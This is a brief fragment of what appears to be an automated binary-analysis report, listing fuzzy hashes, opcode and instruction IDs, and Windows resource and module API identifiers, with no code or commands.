                                                                                • Instruction Fuzzy Hash: 82417422A0E68281FA54BB6DE5501B9A3A1AF85BC0FD60035DF4D077B9DF3DE9518360
                                                                                Similarity
                                                                                • API ID: FindHandleModuleResource
                                                                                • String ID: RTL
                                                                                • API String ID: 3537982541-834975271
                                                                                • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction ID: 4c5e3a905fc6aa8a8e1b1033231d8dab9147bc951d42f337390771cf95d2b608
                                                                                • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction Fuzzy Hash: E9D05B51F0B74241FF596779644533457505F18B41FC94038C80D06371EE2CD088C760